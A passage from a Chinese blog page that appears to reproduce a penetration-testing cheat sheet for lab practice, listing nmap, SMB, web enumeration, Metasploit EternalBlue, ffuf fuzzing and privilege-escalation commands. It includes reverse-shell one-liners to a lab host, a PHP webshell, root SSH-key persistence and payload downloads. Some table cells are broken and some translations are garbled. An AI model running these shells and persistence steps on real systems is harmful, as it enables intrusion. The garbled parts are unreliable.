<td>Gem 是 RubyGems 的前端，Ruby 的标准包管理器。</td>
</tr>
<tr>
<td><code>pip</code></td>
<td>Pip 是一个 Python 软件包安装程序，推荐用于安装 Debian 存档中不可用的 Python 软件包。它可以与版本控制存储库（目前只有 Git、Mercurial 和 Bazaar 存储库）一起使用，广泛记录输出，并通过在开始安装之前下载所有要求来防止部分安装。</td>
</tr>
<tr>
<td><code>git</code></td>
<td>Git 是一个快速、可扩展的分布式版本控制系统，具有异常丰富的命令集，既提供高级操作，又提供对内部内容的完全访问。</td>
</tr>
</tbody></table>
<h3 id="基本工具"><a href="#基本工具" class="headerlink" title="基本工具"></a>基本工具</h3><table>
<thead>
<tr>
<th><strong>命令</strong></th>
<th><strong>描述</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>常规</strong></td>
<td></td>
</tr>
<tr>
<td><code>sudo openvpn user.ovpn</code></td>
<td>连接到虚拟专用网络</td>
</tr>
<tr>
<td><code>ifconfig</code>&#x2F;<code>ip a</code></td>
<td>显示我们的 IP 地址</td>
</tr>
<tr>
<td><code>netstat -rn</code></td>
<td>显示可通过 VPN 访问的网络</td>
</tr>
<tr>
<td><code>ssh user@10.10.10.10</code></td>
<td>通过 SSH 连接到远程服务器</td>
</tr>
<tr>
<td><code>ftp 10.129.42.253</code></td>
<td>FTP 到远程服务器</td>
</tr>
<tr>
<td><strong>鞘鞘</strong></td>
<td></td>
</tr>
<tr>
<td><code>tmux</code></td>
<td>启动 tmux</td>
</tr>
<tr>
<td><code>ctrl+b</code></td>
<td>TMUX：默认前缀</td>
</tr>
<tr>
<td><code>prefix c</code></td>
<td>TMUX：新窗口</td>
</tr>
<tr>
<td><code>prefix 1</code></td>
<td>TMUX：切换到窗口 （<code>1</code>)</td>
</tr>
<tr>
<td><code>prefix shift+%</code></td>
<td>TMUX：垂直拆分窗格</td>
</tr>
<tr>
<td><code>prefix shift+&quot;</code></td>
<td>TMUX：水平拆分窗格</td>
</tr>
<tr>
<td><code>prefix -&gt;</code></td>
<td>TMUX：切换到右窗格</td>
</tr>
<tr>
<td><strong>维姆</strong></td>
<td></td>
</tr>
<tr>
<td><code>vim file</code></td>
<td>VIM：使用 VIM 打开<code>file</code></td>
</tr>
<tr>
<td><code>esc+i</code></td>
<td>VIM：进入模式<code>insert</code></td>
</tr>
<tr>
<td><code>esc</code></td>
<td>VIM：返回模式<code>normal</code></td>
</tr>
<tr>
<td><code>x</code></td>
<td>vim：剪切字符</td>
</tr>
<tr>
<td><code>dw</code></td>
<td>vim：剪切词</td>
</tr>
<tr>
<td><code>dd</code></td>
<td>vim：切割整条线</td>
</tr>
<tr>
<td><code>yw</code></td>
<td>vim：复制单词</td>
</tr>
<tr>
<td><code>yy</code></td>
<td>vim：复制整行</td>
</tr>
<tr>
<td><code>p</code></td>
<td>vim：粘贴</td>
</tr>
<tr>
<td><code>:1</code></td>
<td>vim：转到第 1 行。</td>
</tr>
<tr>
<td><code>:w</code></td>
<td>vim：写入文件“即保存”</td>
</tr>
<tr>
<td><code>:q</code></td>
<td>vim：退出</td>
</tr>
<tr>
<td><code>:q!</code></td>
<td>vim：退出而不保存</td>
</tr>
<tr>
<td><code>:wq</code></td>
<td>vim：写和退出</td>
</tr>
</tbody></table>
<!-- more -->

<h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h2><table>
<thead>
<tr>
<th><strong>命令</strong></th>
<th><strong>描述</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>服务扫描</strong></td>
<td></td>
</tr>
<tr>
<td><code>nmap 10.129.42.253</code></td>
<td>在 IP 上运行 nmap</td>
</tr>
<tr>
<td><code>nmap -sV -sC -p- 10.129.42.253</code></td>
<td>在 IP 上运行 nmap 脚本扫描</td>
</tr>
<tr>
<td><code>locate scripts/citrix</code></td>
<td>列出各种可用的 nmap 脚本</td>
</tr>
<tr>
<td><code>nmap --script smb-os-discovery.nse -p445 10.10.10.40</code></td>
<td>在 IP 上运行 nmap 脚本</td>
</tr>
<tr>
<td><code>netcat 10.10.10.10 22</code></td>
<td>抓取开放端口的横幅</td>
</tr>
<tr>
<td><code>smbclient -N -L \\\\10.129.42.253</code></td>
<td>列出中小企业共享</td>
</tr>
<tr>
<td><code>smbclient \\\\10.129.42.253\\users</code></td>
<td>连接到 SMB 共享</td>
</tr>
<tr>
<td><code>snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0</code></td>
<td>扫描 IP 上的 SNMP</td>
</tr>
<tr>
<td><code>onesixtyone -c dict.txt 10.129.42.254</code></td>
<td>暴力破解 SNMP 机密字符串</td>
</tr>
<tr>
<td><strong>网络枚举</strong></td>
<td></td>
</tr>
<tr>
<td><code>gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt</code></td>
<td>在网站上运行目录扫描</td>
</tr>
<tr>
<td><code>gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt</code></td>
<td>在网站上运行子域扫描</td>
</tr>
<tr>
<td><code>curl -IL https://www.inlanefreight.com</code></td>
<td>抓取网站横幅</td>
</tr>
<tr>
<td><code>whatweb 10.10.10.121</code></td>
<td>列出有关 Web 服务器&#x2F;证书的详细信息</td>
</tr>
<tr>
<td><code>curl 10.10.10.121/robots.txt</code></td>
<td>列出潜在目录<code>robots.txt</code></td>
</tr>
<tr>
<td><code>ctrl+U</code></td>
<td>查看页面源代码（在火狐中）</td>
</tr>
<tr>
<td><strong>公共漏洞利用</strong></td>
<td></td>
</tr>
<tr>
<td><code>searchsploit openssh 7.2</code></td>
<td>搜索 Web 应用程序的公共漏洞</td>
</tr>
<tr>
<td><code>msfconsole</code></td>
<td>MSF：启动 Metasploit 框架</td>
</tr>
<tr>
<td><code>search exploit eternalblue</code></td>
<td>MSF：在 MSF 中搜索公共漏洞</td>
</tr>
<tr>
<td><code>use exploit/windows/smb/ms17_010_psexec</code></td>
<td>MSF：开始使用 MSF 模块</td>
</tr>
<tr>
<td><code>show options</code></td>
<td>MSF：显示 MSF 模块所需的选项</td>
</tr>
<tr>
<td><code>set RHOSTS 10.10.10.40</code></td>
<td>MSF：设置 MSF 模块选项的值</td>
</tr>
<tr>
<td><code>check</code></td>
<td>MSF：测试目标服务器是否易受攻击</td>
</tr>
<tr>
<td><code>exploit</code></td>
<td>MSF：在目标服务器上运行漏洞易受攻击</td>
</tr>
<tr>
<td><strong>使用外壳</strong></td>
<td></td>
</tr>
<tr>
<td><code>nc -lvnp 1234</code></td>
<td>在本地端口上启动侦听器<code>nc</code></td>
</tr>
<tr>
<td><code>bash -c &#39;bash -i &gt;&amp; /dev/tcp/10.10.10.10/1234 0&gt;&amp;1&#39;</code></td>
<td>从远程服务器发送反向外壳</td>
</tr>
<tr>
<td>&#96;rm &#x2F;tmp&#x2F;f;mkfifo &#x2F;tmp&#x2F;f;cat &#x2F;tmp&#x2F;f</td>
<td>&#x2F;bin&#x2F;sh -i 2&gt;&amp;1</td>
</tr>
<tr>
<td>&#96;rm &#x2F;tmp&#x2F;f;mkfifo &#x2F;tmp&#x2F;f;cat &#x2F;tmp&#x2F;f</td>
<td>&#x2F;bin&#x2F;bash -i 2&gt;&amp;1</td>
</tr>
<tr>
<td><code>nc 10.10.10.1 1234</code></td>
<td>连接到远程服务器上启动的绑定外壳</td>
</tr>
<tr>
<td><code>python -c &#39;import pty; pty.spawn(&quot;/bin/bash&quot;)&#39;</code></td>
<td>升级外壳 TTY （1）</td>
</tr>
<tr>
<td><code>ctrl+z</code>然后然后是两次<code>stty raw -echo``fg``enter</code></td>
<td>升级外壳 TTY （2）</td>
</tr>
<tr>
<td><code>echo &quot;&lt;?php system(\$_GET[&#39;cmd&#39;]);?&gt;&quot; &gt; /var/www/html/shell.php</code></td>
<td>创建一个 webshell php 文件</td>
</tr>
<tr>
<td><code>curl http://SERVER_IP:PORT/shell.php?cmd=id</code></td>
<td>在上传的 Web 外壳上执行命令</td>
</tr>
<tr>
<td><strong>权限提升</strong></td>
<td></td>
</tr>
<tr>
<td><code>./linpeas.sh</code></td>
<td>运行脚本以枚举远程服务器<code>linpeas</code></td>
</tr>
<tr>
<td><code>sudo -l</code></td>
<td>列出可用权限<code>sudo</code></td>
</tr>
<tr>
<td><code>sudo -u user /bin/echo Hello World!</code></td>
<td>运行命令<code>sudo</code></td>
</tr>
<tr>
<td><code>sudo su -</code></td>
<td>切换到根用户（如果我们有权访问<code>sudo su</code>)</td>
</tr>
<tr>
<td><code>sudo su user -</code></td>
<td>切换到用户（如果我们有权访问<code>sudo su</code>)</td>
</tr>
<tr>
<td><code>ssh-keygen -f key</code></td>
<td>创建新的 SSH 密钥</td>
</tr>
<tr>
<td><code>echo &quot;ssh-rsa AAAAB...SNIP...M= user@parrot&quot; &gt;&gt; /root/.ssh/authorized_keys</code></td>
<td>将生成的公钥添加到用户</td>
</tr>
<tr>
<td><code>ssh root@10.10.10.10 -i key</code></td>
<td>使用生成的私钥通过 SSH 连接到服务器</td>
</tr>
<tr>
<td><strong>传输文件</strong></td>
<td></td>
</tr>
<tr>
<td><code>python3 -m http.server 8000</code></td>
<td>启动本地网络服务器</td>
</tr>
<tr>
<td><code>wget http://10.10.14.1:8000/linpeas.sh</code></td>
<td>从我们的本地计算机下载远程服务器上的文件</td>
</tr>
<tr>
<td><code>curl http://10.10.14.1:8000/linenum.sh -o linenum.sh</code></td>
<td>从我们的本地计算机下载远程服务器上的文件</td>
</tr>
<tr>
<td><code>scp linenum.sh user@remotehost:/tmp/linenum.sh</code></td>
<td>使用（需要 SSH 访问）将文件传输到远程服务器<code>scp</code></td>
</tr>
<tr>
<td><code>base64 shell -w 0</code></td>
<td>将文件转换为<code>base64</code></td>
</tr>
<tr>
<td>&#96;echo f0VMR…SNIO…InmDwU</td>
<td>base64 -d &gt; shell&#96;</td>
</tr>
<tr>
<td><code>md5sum shell</code></td>
<td>检查文件以确保其转换正确<code>md5sum</code></td>
</tr>
</tbody></table>
<h3 id="备忘录-1"><a href="#备忘录-1" class="headerlink" title="备忘录"></a>备忘录</h3><h4 id="Ffuf"><a href="#Ffuf" class="headerlink" title="Ffuf"></a>Ffuf</h4><table>
<thead>
<tr>
<th><strong>Command</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody><tr>
<td><code>ffuf -h</code></td>
<td>ffuf help</td>
</tr>
<tr>
<td><code>ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ</code></td>
<td>Directory Fuzzing</td>
</tr>
<tr>
<td><code>ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ</code></td>
<td>Extension Fuzzing</td>
</tr>
<tr>
<td><code>ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php</code></td>
<td>Page Fuzzing</td>
</tr>
<tr>
<td><code>ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v</code></td>
<td>Recursive Fuzzing</td>
</tr>
<tr>
<td><code>ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/</code></td>
<td>Sub-domain Fuzzing</td>
</tr>
<tr>
<td><code>ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H &#39;Host: FUZZ.academy.htb&#39; -fs xxx</code></td>
<td>VHost Fuzzing</td>
</tr>
<tr>
<td><code>ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx</code></td>
<td>Parameter Fuzzing - GET</td>
</tr>
<tr>
<td><code>ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d &#39;FUZZ=key&#39; -H &#39;Content-Type: application/x-www-form-urlencoded&#39; -fs xxx</code></td>
<td>Parameter Fuzzing - POST</td>
</tr>
<tr>
<td><code>ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d &#39;id=FUZZ&#39; -H &#39;Content-Type: application/x-www-form-urlencoded&#39; -fs xxx</code></td>
<td>Value Fuzzing</td>
</tr>
</tbody></table>
<h4 id="Wordlists"><a href="#Wordlists" class="headerlink" title="Wordlists"></a>Wordlists</h4><table>
<thead>
<tr>
<th><strong>Command</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody><tr>
<td><code>/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt</code></td>
<td>Directory&#x2F;Page Wordlist</td>
</tr>
<tr>
<td><code>/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt</code></td>
<td>Extensions Wordlist</td>
</tr>
<tr>
<td><code>/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt</code></td>
<td>Domain Wordlist</td>
</tr>
<tr>
<td><code>/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt</code></td>
<td>Parameters Wordlist</td>
</tr>
</tbody></table>
<h4 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h4><table>
<thead>
<tr>
<th><strong>Command</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody><tr>
<td><code>sudo sh -c &#39;echo &quot;SERVER_IP academy.htb&quot; &gt;&gt; /etc/hosts&#39;</code></td>
<td>Add DNS entry</td>
</tr>
<tr>
<td><code>for i in $(seq 1 1000); do echo $i &gt;&gt; ids.txt; done</code></td>
<td>Create Sequence Wordlist</td>
</tr>
<tr>
<td><code>curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d &#39;id=key&#39; -H &#39;Content-Type: application/x-www-form-urlencoded&#39;</code></td>
<td>curl w&#x2F; POST</td>
</tr>
</tbody></table>

    </div>

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <div id="comment">
        <div id="gitalk-container">
        </div>
    </div>
    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 2018 - 2023 Salve
            <span class="footer-icon">
                <a-icon type="flag" theme="filled" /></span>
            @TiAmo
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

<script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script>
    const gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: 'hexo-theme-particle',      // The repository of store comments,
        owner: 'korilin',
        admin: ['korilin'],
        language: 'en',
        id: location.pathname,      // Ensure uniqueness and length less than 50
        distractionFreeMode: true  // Facebook-like distraction free mode
    })
    gitalk.render('gitalk-container')
</script>

</body>

</html>